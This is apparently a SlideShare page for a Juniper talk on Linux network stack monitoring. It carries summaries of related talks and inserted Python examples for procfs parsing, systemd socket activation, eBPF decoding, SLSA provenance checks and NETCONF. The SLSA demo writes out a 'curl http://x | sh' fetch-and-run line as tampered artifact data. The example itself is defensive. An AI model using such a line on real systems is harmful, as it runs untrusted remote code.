Sergei Gotchev, Juniper Networks
Juniper Day, Praha, 13.5.2015
If SlideShare does not display the presentation correctly, you can download it in .ppsx or .pdf format (by clicking the button in the bottom bar of the slides).
- The document discusses Linux network stack monitoring and configuration. It begins with definitions of key concepts like RSS, RPS, RFS, LRO, GRO, DCA, XDP and BPF.
- It then provides an overview of how the network stack works from the hardware interrupts and driver level up through routing, TCP/IP and to the socket level.
- Monitoring tools like ethtool, ftrace and /proc/interrupts are described for viewing hardware statistics, software stack traces and interrupt information.
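The two procfs files the deck names as monitoring sources are easy to misread by eye. The following is an added example (not code from the Juniper Day slides) that parses a constructed /proc/interrupts excerpt and a constructed /proc/net/softnet_stat excerpt for a hypothetical NIC "eth0" on a 4-CPU host, then answers the two questions a practitioner actually asks: are the RSS queues really spread over different CPUs, and is the softirq path dropping or squeezing packets. The NIC name, queue names and all counters are made up for the demo.

```python
"""Check how a NIC's RSS queues are spread over CPUs and whether the
softirq receive path is dropping or squeezing packets.

Added example, not from the Juniper Day slides.  Only the two procfs
files the deck names are used.  All sample text below is constructed
for a 4-CPU box with a hypothetical NIC "eth0" that has four queues.
"""
import re
from collections import defaultdict

# Constructed /proc/interrupts excerpt (not real hardware).
INTERRUPTS_SAMPLE = """\
           CPU0       CPU1       CPU2       CPU3
  24:     120033          0          0          0   PCI-MSI 524288-edge      eth0-TxRx-0
  25:      99871          0          0          0   PCI-MSI 524289-edge      eth0-TxRx-1
  26:          0     101204          0          0   PCI-MSI 524290-edge      eth0-TxRx-2
  27:          0          0     100877          0   PCI-MSI 524291-edge      eth0-TxRx-3
 NMI:          0          0          0          0   Non-maskable interrupts
"""

# Constructed /proc/net/softnet_stat excerpt: one hex row per CPU.
# column 1 = packets processed, column 2 = dropped (backlog full),
# column 3 = time_squeeze (net_rx_action ran out of budget/time).
SOFTNET_SAMPLE = """\
0001d4c0 00000000 00000012 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00018b2e 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00018a19 00000004 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
"""


def parse_interrupts(text):
    """Return {action_name: [count per CPU]} for every numbered IRQ line."""
    lines = text.splitlines()
    ncpu = len(lines[0].split())
    result = {}
    for line in lines[1:]:
        m = re.match(r"\s*(\d+):\s+((?:\d+\s+){%d})(.*)$" % ncpu, line)
        if not m:
            continue  # NMI/LOC/... rows are named, not numbered
        counts = [int(c) for c in m.group(2).split()]
        name = m.group(3).split()[-1]  # last token is the action name
        result[name] = counts
    return result


def queue_cpu_map(irqs, nic):
    """Map each queue of `nic` to the CPU that actually services it
    (the one with the highest count)."""
    mapping = {}
    for name, counts in irqs.items():
        if name.startswith(nic + "-"):
            mapping[name] = max(range(len(counts)), key=counts.__getitem__)
    return mapping


def colliding_cpus(mapping):
    """CPUs that service more than one queue: RSS/IRQ affinity is not
    doing its job there."""
    by_cpu = defaultdict(list)
    for queue, cpu in mapping.items():
        by_cpu[cpu].append(queue)
    return {cpu: qs for cpu, qs in by_cpu.items() if len(qs) > 1}


def parse_softnet(text):
    """Return [(processed, dropped, squeezed)] per CPU."""
    rows = []
    for line in text.splitlines():
        cols = [int(x, 16) for x in line.split()]
        rows.append((cols[0], cols[1], cols[2]))
    return rows


def softnet_problems(rows):
    """CPUs whose softirq path dropped or squeezed at least once."""
    return {cpu: r for cpu, r in enumerate(rows) if r[1] or r[2]}


if __name__ == "__main__":
    irqs = parse_interrupts(INTERRUPTS_SAMPLE)
    qmap = queue_cpu_map(irqs, "eth0")
    print("queue -> cpu:", qmap)
    print("CPUs serving more than one queue:", colliding_cpus(qmap))
    print("CPUs with drops/squeezes:", softnet_problems(parse_softnet(SOFTNET_SAMPLE)))
```

On a live host, feed the functions the contents of the real files; a queue collision points at IRQ affinity (/proc/irq/N/smp_affinity) or RSS configuration (ethtool -x), and a growing time_squeeze column points at netdev_budget rather than at the NIC.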
Advanced Tools and Techniques for Troubleshooting NetScaler Appliances, David McGeough
This session will cover advanced techniques in troubleshooting the Citrix NetScaler Appliance using tools such as Citrix TaaS, IPMI, nsconmsg, wireshark and log analysis. We will review usages of these tools along with case studies showing how to best troubleshoot common issues seen in operating Citrix NetScaler Appliances.
What you will learn
- Various tools available to troubleshoot issues and how to use them to isolate NetScaler Issues
- Common deployment problems and how to isolate the causes
This document provides an overview of Juniper Networks' high availability and security capabilities for its SRX series firewall and security gateway products. It discusses the SRX architecture including components like IOC, NPC, and SPC cards. It then covers key high availability features like active/active and active/standby redundancy, data and control path separation, load sharing, data synchronization, and stateful failover. The document also reviews troubleshooting techniques, in service software upgrade processes, and a list of features supported by ISSU for different Junos releases.
This document describes how to graph SAR (System Activity Report) reports using the KSar tool and an online utility. KSar is a Java-based application that generates graphs from SAR data stored locally or on another server, showing values such as CPU usage and RAM consumption. The online utility lets you upload and view SAR files for free in a browser, generating summaries and interactive graphs of resources such as CPU, load and RAM.
Kernel Recipes 2015 - Kernel dump analysis, Anne Nicolas
Kernel dump analysis
Cloud this, cloud that… It makes everything easier, especially for web-hosted services. But what about the servers that are not supposed to crash? For applications that assume the OS will never fault or go down, what can you write in your post-mortem once the server has frozen and been restarted? How do you track down the bug that led to the service being unavailable?
In this talk, we'll see how to set up kdump and how to panic a server to generate a core dump. Once you have the vmcore file, we'll see how to track down the issue with the "crash" tool to find out why your OS went down. Last but not least: with "crash" you can also modify your live kernel, the same way you would with gdb.
Adrien Mahieux – System administrator obsessed with performance and uptime, tracking down microseconds from hardware to software since 2011. The application must be seen as a whole to provide the requested service efficiently. This includes searching for bottlenecks and trade-offs, design issues or hardware optimizations.
Introduction to the Linux kernel TCP/IP protocol stack, monad bobo
This document provides an introduction and overview of the networking code in the Linux kernel source tree. It discusses the different layers including link (L2), network (L3), and transport (L4) layers. It describes the input and output processing, device interfaces, traffic directions, and major developers for each layer. Config and benchmark tools are also mentioned. Resources for further learning about the Linux kernel networking code are provided at the end.
The document discusses analyzing Linux kernel crash dumps. It covers various ways to gather crash data like serial console, netconsole, kmsg dumpers, Kdump, and Pstore. It then discusses analyzing the crashed kernel using tools like ksymoops, crash utility, and examining the backtrace, kernel logs, processes, and file descriptors. The document provides examples of gathering data from Pstore and using commands like bt, log, and ps with the crash utility to extract information from a crash dump.
Accelerated Linux Core Dump Analysis training public slides, Dmitry Vostokov
The slides from Software Diagnostics Services Linux core dump analysis training. The training description: "Learn how to analyse Linux process crashes and hangs, navigate through process core memory dump space and diagnose corruption, memory leaks, CPU spikes, blocked threads, deadlocks, wait chains, and much more. This book uses a unique and innovative pattern-oriented diagnostic analysis approach to speed up the learning curve. The training consists of 13 practical step-by-step exercises using GDB debugger highlighting more than 25 memory analysis patterns diagnosed in 64-bit process core memory dumps. The training also includes source code of modelling applications, a catalogue of relevant patterns from Software Diagnostics Institute, and an overview of relevant similarities and differences between Windows and Linux user space memory dump analysis useful for engineers with Wintel background."
This document discusses file systems and distributed file systems. It describes how file systems work, including hardware, partitions, logical volume management (LVM), and basic and distributed file systems. It focuses on GlusterFS and NFS distributed file systems. GlusterFS allows various volume types including distributed, replicated, distributed-replicated and stripe. NFS provides network access but no redundancy. The document also discusses storage solutions for AI training workloads, including Pure Storage FlashBlade and AIRI systems optimized for high-performance needs of AI.
Building IAM for OpenStack, presented at CIS (Cloud Identity Summit) 2015.
Discuss Identity Sources, Authentication, Managing Access and Federating Identities
Systemd is an init system that replaces traditional init daemons. It allows for parallel startup of services through dependency-based activation of units which encapsulate system objects like services, devices, and mounts. Systemd also provides on-demand activation of services through sockets, buses, devices, and file paths. It aims to be backwards compatible with System V while offering improvements like parallel startup and centralized logging.
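Socket activation, the on-demand mechanism the summary above mentions, has a small wire protocol between systemd and the service it starts: the listening sockets arrive as file descriptors 3, 4, ... and the environment variables LISTEN_PID, LISTEN_FDS and LISTEN_FDNAMES say how many there are and for which process. The following is an added example (not from the presentation, and not the sd_listen_fds() implementation from libsystemd) that implements that hand-off in Python, including the checks a hardened service should not skip: the pid check that stops a forked child from claiming the parent's sockets, the name/count consistency check, marking the descriptors close-on-exec, and scrubbing the LISTEN_* variables. The unit names ("http", "metrics") and the sample environment are constructed; the stand-alone demo fakes systemd by placing a local listener at fd 3.

```python
"""Adopt sockets passed by systemd socket activation.

Added example, not from the presentation and not libsystemd's code.  It
follows the LISTEN_PID / LISTEN_FDS / LISTEN_FDNAMES contract documented
in sd_listen_fds(3): passed descriptors start at fd 3 and LISTEN_PID
must equal our own pid.  Names and sample environments are constructed.
"""
import os
import socket

SD_LISTEN_FDS_START = 3


def listen_fds(environ, pid):
    """Return [(name, fd), ...] for sockets systemd passed to process `pid`.

    An empty list means "not socket-activated (or not for us)".  A
    malformed hand-off raises ValueError; a hardened service treats that
    as fatal rather than guessing which descriptors are sockets."""
    if environ.get("LISTEN_PID") != str(pid):
        return []  # inherited by a child, or not activated at all
    try:
        nfds = int(environ.get("LISTEN_FDS", "0"))
    except ValueError:
        raise ValueError("LISTEN_FDS is not an integer")
    if nfds < 0:
        raise ValueError("negative LISTEN_FDS")
    names_var = environ.get("LISTEN_FDNAMES", "")
    names = names_var.split(":") if names_var else []
    if names and len(names) != nfds:
        raise ValueError("LISTEN_FDNAMES count does not match LISTEN_FDS")
    if not names:
        names = ["unknown"] * nfds  # same placeholder libsystemd uses
    return [(name, SD_LISTEN_FDS_START + i) for i, name in enumerate(names)]


def adopt_sockets(environ, pid):
    """Wrap passed fds as socket objects, mark them close-on-exec so they
    do not leak into subprocesses, and scrub the LISTEN_* variables so a
    child cannot re-claim them."""
    socks = []
    for name, fd in listen_fds(environ, pid):
        os.set_inheritable(fd, False)
        socks.append((name, socket.socket(fileno=fd)))  # family/type auto-detected
    for var in ("LISTEN_PID", "LISTEN_FDS", "LISTEN_FDNAMES"):
        environ.pop(var, None)
    return socks


if __name__ == "__main__":
    # Stand-alone demo: play systemd ourselves.  Bind a listener on an
    # ephemeral port, move it to fd 3 and set the environment as systemd
    # would for this pid.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    fd = srv.detach()  # we now own the raw descriptor
    if fd != SD_LISTEN_FDS_START:
        os.dup2(fd, SD_LISTEN_FDS_START)
        os.close(fd)
    env = {"LISTEN_PID": str(os.getpid()), "LISTEN_FDS": "1", "LISTEN_FDNAMES": "http"}
    for name, sock in adopt_sockets(env, os.getpid()):
        print("adopted %s on %s" % (name, sock.getsockname()))
        sock.close()
    print("LISTEN_* scrubbed:", not any(k.startswith("LISTEN_") for k in env))
```

In a real unit the names come from FileDescriptorName= in the .socket file; matching on the name rather than on fd order is what keeps the service correct when a second socket unit is added later.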
USENIX LISA2021 talk by Brendan Gregg (https://www.youtube.com/watch?v=_5Z2AU7QTH4). This talk is a deep dive that describes how BPF (eBPF) works internally on Linux, and dissects some modern performance observability tools. Details covered include the kernel BPF implementation: the verifier, JIT compilation, and the BPF execution environment; the BPF instruction set; different event sources; and how BPF is used by user space, using bpftrace programs as an example. This includes showing how bpftrace is compiled to LLVM IR and then BPF bytecode, and how per-event data and aggregated map data are fetched from the kernel.
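The talk walks through the BPF instruction set and the verifier; the following is an added example (not Brendan Gregg's code, not bpftrace) that makes both concrete. It decodes raw 64-bit BPF instructions (opcode:8, dst_reg:4, src_reg:4, off:16, imm:32, little-endian, the layout the kernel's bpf_insn uses) into readable mnemonics, and runs two of the structural checks the in-kernel verifier performs before it will JIT a program: every jump must land inside the program, and the last instruction must be exit. The eight-instruction program is hand-assembled for the demo; the assumption that helper 6 is bpf_trace_printk follows the kernel's helper numbering.

```python
"""Decode raw eBPF instructions and run two verifier-style checks.

Added example, not code from the LISA21 talk.  Instruction layout is the
kernel's: opcode:8, dst_reg:4, src_reg:4, off:16, imm:32 (little-endian).
The program bytes below are hand-assembled for illustration.
"""
import struct

CLASSES = {0: "ld", 1: "ldx", 2: "st", 3: "stx", 4: "alu", 5: "jmp", 6: "jmp32", 7: "alu64"}
ALU_OPS = {0x00: "add", 0x10: "sub", 0x20: "mul", 0x30: "div", 0x40: "or", 0x50: "and",
           0x60: "lsh", 0x70: "rsh", 0x80: "neg", 0x90: "mod", 0xa0: "xor", 0xb0: "mov",
           0xc0: "arsh", 0xd0: "end"}
JMP_OPS = {0x00: "ja", 0x10: "jeq", 0x20: "jgt", 0x30: "jge", 0x40: "jset", 0x50: "jne",
           0x60: "jsgt", 0x70: "jsge", 0x80: "call", 0x90: "exit", 0xa0: "jlt", 0xb0: "jle",
           0xc0: "jslt", 0xd0: "jsle"}
SIZES = {0x00: "w", 0x08: "h", 0x10: "b", 0x18: "dw"}

INSN = struct.Struct("<BBhi")  # 8 bytes per instruction


def decode(code):
    """Return [(index, mnemonic)] for each 8-byte instruction in `code`."""
    out = []
    for i in range(0, len(code), 8):
        op, regs, off, imm = INSN.unpack_from(code, i)
        dst, src = regs & 0x0f, regs >> 4
        cls = CLASSES[op & 0x07]                 # class = low 3 bits
        if cls in ("alu", "alu64"):
            name = ALU_OPS[op & 0xf0] + ("64" if cls == "alu64" else "32")
            rhs = "r%d" % src if op & 0x08 else str(imm)   # bit 3: X (reg) or K (imm)
            text = "%s r%d, %s" % (name, dst, rhs)
        elif cls in ("jmp", "jmp32"):
            name = JMP_OPS[op & 0xf0]
            if name == "exit":
                text = "exit"
            elif name == "call":
                text = "call helper#%d" % imm
            elif name == "ja":
                text = "ja +%d" % off
            else:
                rhs = "r%d" % src if op & 0x08 else str(imm)
                text = "%s r%d, %s, +%d" % (name, dst, rhs, off)
        else:                                     # memory: size in bits 3-4
            size = SIZES[op & 0x18]
            if cls == "ldx":
                text = "ldx%s r%d, [r%d%+d]" % (size, dst, src, off)
            elif cls == "stx":
                text = "stx%s [r%d%+d], r%d" % (size, dst, off, src)
            elif cls == "st":
                text = "st%s [r%d%+d], %d" % (size, dst, off, imm)
            else:
                text = "ld%s r%d, %d" % (size, dst, imm)
        out.append((i // 8, text))
    return out


def verify_structure(code):
    """Two of the verifier's checks: jump targets stay inside the
    program and the program ends with exit.  Returns a list of problems
    (empty means these checks pass)."""
    if len(code) % 8:
        return ["length not a multiple of 8"]
    n = len(code) // 8
    problems = []
    for i in range(n):
        op, _, off, _ = INSN.unpack_from(code, i * 8)
        if (op & 0x07) in (5, 6) and (op & 0xf0) not in (0x80, 0x90):  # real jump
            target = i + 1 + off
            if not 0 <= target < n:
                problems.append("insn %d jumps out of program (to %d)" % (i, target))
    if n == 0 or code[(n - 1) * 8] != 0x95:
        problems.append("last instruction is not exit")
    return problems


# Hand-assembled program: load a ctx field, compare, maybe trace, return 0.
PROGRAM = bytes.fromhex(
    "bf16000000000000"  # mov64 r6, r1        (save ctx pointer)
    "7961100000000000"  # ldxdw r1, [r6+16]   (load a 64-bit ctx field)
    "5501030002000000"  # jne r1, 2, +3       (skip the call if != 2)
    "b701000000000000"  # mov64 r1, 0
    "b702000000000000"  # mov64 r2, 0
    "8500000006000000"  # call helper#6       (bpf_trace_printk, assumed id)
    "b700000000000000"  # mov64 r0, 0
    "9500000000000000"  # exit
)

if __name__ == "__main__":
    for idx, text in decode(PROGRAM):
        print("%2d: %s" % (idx, text))
    print("verifier problems:", verify_structure(PROGRAM) or "none")
```

The real verifier does far more (register state tracking, bounds, helper argument types, map access), but these two checks are the first it applies and the ones a hand-crafted program most often fails.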
A Deep Dive into macOS MDM (and How it can be Compromised), Priyanka Aash
This document provides an overview of macOS MDM (Mobile Device Management) and DEP (Device Enrollment Program) protocols. It describes the 7 key steps in the enrollment process: 1) device record creation, 2) assignment, 3) sync, 4) check-in, 5) profile retrieval, 6) profile installation, and 7) listening for MDM commands. It then details a vulnerability in the "InstallApplication" command that could allow a man-in-the-middle attack and demonstrates an exploit. Recommendations are provided for Apple and MDM vendors to improve security, such as requiring pinning and revocation checks.
Tutorial WiFi driver code - Opening Nuts and Bolts of Linux WiFi Subsystem, Dheryta Jaisinghani
While we understand the complex interplay of OSI layers in theory, in practice understanding their implementation is a non-trivial task. The implementation details that enable a network interface card to communicate with its peers are hidden from end users. Developers venturing into this domain for the first time often find it hard to find relevant tutorials that enable them to understand these implementation details. The aim of this talk is to provide an overview of the WiFi subsystem implemented in the Linux operating system. Specifically, this talk will explain the sequence of events that occur from the application layer to the physical layer when a connection is established over WiFi. After this talk, the audience will understand
(1) the bird's eye view of Linux WiFi Subsystem,
(2) what happens in an operating system when a WiFi card is plugged-in,
(3) how is a packet received/transmitted from physical layer to operating system kernel and vice-versa,
(4) brief overview of code structure of open-source drivers, and lastly
(5) important pointers to kick start driver code modifications.
Video Available here: https://www.youtube.com/watch?v=pa1oEyc7Dm0
The Linux kernel is undergoing the most fundamental architecture evolution in history and is becoming a microkernel. Why is the Linux kernel evolving into a microkernel? The potentially biggest fundamental change ever happening to the Linux kernel. This talk covers how companies like Facebook and Google use BPF to patch 0-day exploits, how BPF will change the way features are added to the kernel forever, and how BPF is introducing a new type of application deployment method for the Linux kernel.
This document discusses KVM virtualization and why it is considered the best platform. It states that KVM provides high performance, strong security through EAL4+ certification and SELinux, and can save customers up to 70% on costs compared to other solutions. It also supports various operating systems and works with Red Hat products like OpenStack and Red Hat Enterprise Virtualization for managing virtualization. Charts are included showing KVM outperforming VMware on benchmark tests using different CPU core counts.
This document provides an overview of a PowerShell Basics training session. It discusses the curriculum, which will cover topics like the basics of PowerShell, cmdlets, piping, and scripting over 4 days. It highlights why PowerShell is useful for system administrators by providing a simplified syntax and being more secure than VBScript. PowerShell allows familiar commands and integrates with Microsoft products like Windows, Exchange, and SQL Server.
Lesson 2: Understanding the Linux File System, Sadia Bashir
The document provides an overview of Linux file systems and file types. It discusses:
1) The main types of files in Linux including directories, special files, links, sockets and pipes.
2) The standard Linux directory structure and the purpose of directories like /bin, /sbin, /etc, and /usr.
3) Common Linux file extensions and hidden files that begin with a dot.
4) Environment variables and how they can be used to customize a system.
5) Symbolic links and how they create references to files without copying the actual file.
The document provides information about RPM (Red Hat Package Manager), including that it is the default package management system for Red Hat-based Linux distributions. It describes how RPM allows users to install, update, uninstall, query, verify and manage software packages. It also provides examples of common RPM commands and their usage, such as installing, upgrading, verifying, and querying packages.
This document discusses Linux kernel crash capture and analysis. It begins with an overview of what constitutes a kernel crash and reasons crashes may occur, both from hardware and software issues. It then covers using kdump to capture virtual memory cores (vmcores) when a crash happens, and configuring kdump for optimal core collection. Finally, it discusses analyzing vmcores after collection using the crash utility, including commands to inspect system information, backtraces, logs, and more.
This document provides an overview of advanced Docker topics including Docker installation, Docker networking using bridges and volumes, and creating Dockerfiles. It discusses installing Docker on CentOS, the different types of Docker networks including bridge, host, overlay and macvlan. It also covers creating and managing Docker volumes, starting containers with volumes, and creating Dockerfiles with components like FROM, RUN, COPY and ENTRYPOINT.
Introduction to the new MediaTek LinkIt™ Development Platform for RTOS, MediaTek Labs
The new MediaTek LinkIt™ Development Platform for RTOS is based on ARM Cortex-M4 MCU architecture and provides leading features for the creation of connected appliances, home and office automation devices, smart gadgets, and IoT bridges. Supporting a range of chipsets (initially the MediaTek MT7687F), LinkIt for RTOS offers the convenience of a single toolset and common API implemented over a popular RTOS. With this you can achieve economies across a full range of consumer and business IoT devices. The platform consists of a Software Development Kit (SDK), Hardware Development Kits (HDKs), including modules from supply chain partners, and related technical documentation. The first release of the platform supports the MediaTek MT7687F Wi-Fi SOC which has a 192 MHz MCU, 1×1 802.11b/g/n Wi-Fi subsystem, integrated security engine (AES and 3DES/SHA), embedded SRAM/ROM and 2MB flash. The new platform uses FreeRTOS with open-source modules for TCP/IP, SSL/TLS, HTTP (client and server), SNTP, DHCP daemon, MQTT, XML and JSON. Development and debugging is supported by free command line tools, plus a KEIL plug-in.
SLSA - An End-to-End Framework for Supply Chain Integrity, Sakha Global
One of the biggest challenges for software developers is the need to make informed choices about the external software and products they use in their own software systems. Evaluating whether a given system is appropriately secured can be challenging, especially if it’s external or owned by a third party.
This so-called software supply chain has been under increasing scrutiny in recent years, with attacks on software systems being responsible for damages to both public and private interests. In collaboration with the Open Source Security Foundation (OpenSSF), Google has proposed Supply-chain Levels for Software Artifacts (SLSA). The new SLSA framework formalizes criteria around software supply chain integrity, to help the industry and open-source ecosystem secure the software development lifecycle.
SLSA (pronounced "salsa") is a security framework from source to service, giving anyone working with software a common language for increasing levels of software security and supply chain integrity. It’s how you get from safe enough to being as resilient as possible, at any link in the chain.
This SlideShare explores the concept of SLSA in brief.
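What "supply chain integrity" buys a consumer in practice is a provenance attestation that can be checked before an artifact is trusted. The following is an added example (not from the SLSA project or the slides) that performs that check in Python against a constructed artifact and a constructed in-toto Statement v0.1 carrying SLSA provenance v0.2, wrapped in a DSSE envelope: it recomputes the artifact's SHA-256 and requires it to be a subject of the attestation, then enforces a policy on the builder identity and the source repository. The builder id, repository URI, build type and key id are made-up values under example.invalid. The DSSE signature itself is not verified here (that needs the builder's public key and a signature library); the code does compute the pre-authentication encoding the signature must be checked over, so the check can be slotted in where marked.

```python
"""Verify SLSA provenance before trusting an artifact.

Added example, not from the SLSA project.  The artifact, builder id,
source URI and attestation are all constructed.  Signature verification
over the DSSE envelope is left as a marked hook.
"""
import base64
import hashlib
import json

ARTIFACT = b"#!/bin/sh\necho hello\n"                       # constructed artifact
TRUSTED_BUILDERS = {"https://example.invalid/builder/v1"}   # policy: who may build
TRUSTED_SOURCE = "git+https://example.invalid/org/app"      # policy: from where


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def pae(payload_type, payload):
    """DSSE pre-authentication encoding: the exact bytes an envelope
    signature is made over ('DSSEv1 <len> <type> <len> <payload>')."""
    return b"DSSEv1 %d %s %d %s" % (len(payload_type), payload_type.encode(),
                                    len(payload), payload)


def make_statement(artifact_name, digest_hex, builder_id, source_uri):
    """in-toto Statement v0.1 carrying SLSA provenance v0.2 (constructed)."""
    return {
        "_type": "https://in-toto.io/Statement/v0.1",
        "subject": [{"name": artifact_name, "digest": {"sha256": digest_hex}}],
        "predicateType": "https://slsa.dev/provenance/v0.2",
        "predicate": {
            "builder": {"id": builder_id},
            "buildType": "https://example.invalid/build-types/generic@v1",
            "invocation": {"configSource": {"uri": source_uri,
                                            "digest": {"sha1": "0" * 40}}},
        },
    }


def wrap_dsse(statement):
    """Put a statement in a DSSE envelope.  The signature is left empty:
    a real builder signs pae(payloadType, payload) with its key."""
    payload = json.dumps(statement, separators=(",", ":")).encode()
    return {"payloadType": "application/vnd.in-toto+json",
            "payload": base64.b64encode(payload).decode(),
            "signatures": [{"keyid": "builder-key", "sig": ""}]}


def verify_provenance(envelope, artifact_name, artifact_bytes):
    """Return (ok, reason).  Each early return is a distinct way an
    attacker could slip a substituted artifact past a consumer."""
    if envelope.get("payloadType") != "application/vnd.in-toto+json":
        return False, "unexpected payloadType"
    payload = base64.b64decode(envelope["payload"])
    signed = pae(envelope["payloadType"], payload)
    # Hook: verify envelope["signatures"][i]["sig"] over `signed` with the
    # builder's public key before trusting anything below.
    stmt = json.loads(payload)
    if stmt.get("_type") != "https://in-toto.io/Statement/v0.1":
        return False, "not an in-toto statement"
    if not str(stmt.get("predicateType", "")).startswith("https://slsa.dev/provenance/"):
        return False, "not SLSA provenance"
    subjects = {(s["name"], s["digest"].get("sha256")) for s in stmt.get("subject", [])}
    if (artifact_name, sha256_hex(artifact_bytes)) not in subjects:
        return False, "artifact digest is not a subject of this attestation"
    pred = stmt.get("predicate", {})
    if pred.get("builder", {}).get("id") not in TRUSTED_BUILDERS:
        return False, "untrusted builder"
    src = pred.get("invocation", {}).get("configSource", {}).get("uri")
    if src != TRUSTED_SOURCE:
        return False, "built from unexpected source: %r" % src
    return True, "ok"


if __name__ == "__main__":
    env = wrap_dsse(make_statement("app.sh", sha256_hex(ARTIFACT),
                                   "https://example.invalid/builder/v1", TRUSTED_SOURCE))
    print(verify_provenance(env, "app.sh", ARTIFACT))
    print(verify_provenance(env, "app.sh", ARTIFACT + b"curl http://x | sh\n"))
```

The order matters: the subject digest is checked before any policy on the predicate, because a valid attestation for a different artifact says nothing about the bytes in hand, and the signature must be checked before either, because an unsigned statement is just JSON anyone could have written.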
From KubeCon to ContainerDays, eBPF is trendy in the Cloud Native world. What is eBPF, and why is it revolutionary, and what can it bring to you specifically?
Through concrete examples applied to observability, networking, and security, this talk will explain the principles of eBPF and its concrete advantages to connect and secure Cloud Native applications.
This talk will explain what eBPF is, why it is revolutionary in several fields, give examples of tools using eBPF and what they gain from it, and open up to the future of that technology.
Video: https://www.youtube.com/watch?v=JRFNIKUROPE . Talk for linux.conf.au 2017 (LCA2017) by Brendan Gregg, about Linux enhanced BPF (eBPF). Abstract:
A world of new capabilities is emerging for the Linux 4.x series, thanks to enhancements that have been included in Linux to Berkeley Packet Filter (BPF): an in-kernel virtual machine that can execute user space-defined programs. It is finding uses for security auditing and enforcement, enhancing networking (including eXpress Data Path), and performance observability and troubleshooting. Many new open source tools that use BPF have been written in the past 12 months for performance analysis. Tracing superpowers have finally arrived for Linux!
For its use with tracing, BPF provides the programmable capabilities to the existing tracing frameworks: kprobes, uprobes, and tracepoints. In particular, BPF allows timestamps to be recorded and compared from custom events, allowing latency to be studied in many new places: kernel and application internals. It also allows data to be efficiently summarized in-kernel, including as histograms. This has allowed dozens of new observability tools to be developed so far, including measuring latency distributions for file system I/O and run queue latency, printing details of storage device I/O and TCP retransmits, investigating blocked stack traces and memory leaks, and a whole lot more.
This talk will summarize BPF capabilities and use cases so far, and then focus on its use to enhance Linux tracing, especially with the open source bcc collection. bcc includes BPF versions of old classics, and many new tools, including execsnoop, opensnoop, funccount, ext4slower, and more (many of which I developed). Perhaps you'd like to develop new tools, or use the existing tools to find performance wins large and small, especially when instrumenting areas that previously had zero visibility. I'll also summarize how we intend to use these new capabilities to enhance systems analysis at Netflix.
This document provides a tutorial on NETCONF and YANG, which are standards for network configuration and management. NETCONF was designed to address operators' requirements for easier network-wide configuration, validation of changes, and transactional management across multiple devices. It uses SSH for secure transport and XML encoding. YANG provides data models to define the configuration and state data. The tutorial covers the background and motivation for these standards, an overview of NETCONF operations and examples, and a demonstration of YANG data modeling. It explains how NETCONF enables network-wide atomic transactions, fulfilling a key operator need and improving the cost and complexity of network management.
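The "network-wide atomic transaction" the tutorial describes is, on the wire, three RPCs against a device with the candidate datastore: edit-config into candidate, validate, commit. The following is an added example (not from the tutorial) that builds those messages as XML in the NETCONF base namespace and frames them the way the base:1.1 SSH subsystem expects (chunked "\n#len\n...\n##\n" framing, replacing the "]]>]]>" end-of-message marker of base:1.0). No device is contacted; the YANG-modelled payload is a hypothetical "interfaces" module under a made-up urn:example namespace, and the message ids and interface name are assumptions.

```python
"""Build and frame the NETCONF RPCs for a candidate/validate/commit
transaction.  Added example, not from the tutorial; nothing is sent.
The config payload uses a hypothetical YANG module (urn:example:interfaces).
"""
import xml.etree.ElementTree as ET

NC = "urn:ietf:params:xml:ns:netconf:base:1.0"
IF_NS = "urn:example:interfaces"          # hypothetical YANG module namespace
ET.register_namespace("", NC)             # serialize base elements unprefixed
ET.register_namespace("if", IF_NS)


def nc(tag):
    return "{%s}%s" % (NC, tag)


def rpc(message_id, body):
    """Wrap one operation element in <rpc message-id=...> and serialize it."""
    root = ET.Element(nc("rpc"), {"message-id": str(message_id)})
    root.append(body)
    return ET.tostring(root, encoding="unicode")


def interface_config(name, enabled):
    """YANG-modelled config subtree (hypothetical module) for one interface."""
    ifs = ET.Element("{%s}interfaces" % IF_NS)
    intf = ET.SubElement(ifs, "{%s}interface" % IF_NS)
    ET.SubElement(intf, "{%s}name" % IF_NS).text = name
    ET.SubElement(intf, "{%s}enabled" % IF_NS).text = "true" if enabled else "false"
    return ifs


def transaction(config_subtree, first_id=101):
    """The three RPCs of an atomic change on a candidate-capable device:
    nothing touches the running datastore until <commit/> succeeds."""
    edit = ET.Element(nc("edit-config"))
    ET.SubElement(ET.SubElement(edit, nc("target")), nc("candidate"))
    ET.SubElement(edit, nc("default-operation")).text = "merge"
    ET.SubElement(edit, nc("config")).append(config_subtree)
    validate = ET.Element(nc("validate"))
    ET.SubElement(ET.SubElement(validate, nc("source")), nc("candidate"))
    commit = ET.Element(nc("commit"))
    return [rpc(first_id, edit), rpc(first_id + 1, validate), rpc(first_id + 2, commit)]


def frame_chunked(msg):
    """base:1.1 chunked framing: one chunk plus the end-of-chunks marker."""
    data = msg.encode()
    return b"\n#%d\n%s\n##\n" % (len(data), data)


def unframe_chunked(data):
    """Reassemble one base:1.1 message from its chunks (the receiving side)."""
    out, pos = b"", 0
    while True:
        if data.startswith(b"\n##\n", pos):
            return out
        if not data.startswith(b"\n#", pos):
            raise ValueError("bad chunk header at offset %d" % pos)
        nl = data.index(b"\n", pos + 2)
        n = int(data[pos + 2:nl])
        out += data[nl + 1:nl + 1 + n]
        pos = nl + 1 + n


if __name__ == "__main__":
    for msg in transaction(interface_config("ge-0/0/0", True)):
        print(msg)
        print(frame_chunked(msg))
```

Each RPC is answered by an <rpc-reply> with the same message-id; a client that does not check the reply to <validate> before sending <commit/> loses the whole point of the candidate datastore.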
Open source policy: OpenDaylight and OpFlex, belaire11
Presentation of an approach to building an OpFlex Agent, which operates in an OpenDaylight and/or OpenStack infrastructure using OVS. This will be presented at LinuxCon in Chicago (August 2014).
The document discusses analyzing Linux kernel crash dumps. It covers various ways to gather crash data like serial console, netconsole, kmsg dumpers, Kdump, and Pstore. It then discusses analyzing the crashed kernel using tools like ksymoops, crash utility, and examining the backtrace, kernel logs, processes, and file descriptors. The document provides examples of gathering data from Pstore and using commands like bt, log, and ps with the crash utility to extract information from a crash dump.
Accelerated Linux Core Dump Analysis training public slidesDmitry Vostokov
